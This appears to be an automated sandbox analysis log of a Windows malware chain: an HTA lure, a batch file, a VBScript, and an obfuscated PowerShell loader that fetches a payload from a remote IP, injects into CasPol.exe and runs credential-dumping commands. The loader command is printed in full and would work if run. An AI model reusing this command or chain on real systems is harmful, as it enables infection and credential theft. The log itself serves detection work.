Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 0000000E.00000003.1402946191.0000000004C41000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000003.1404687300.0000000004C41000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000002.1405674641.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
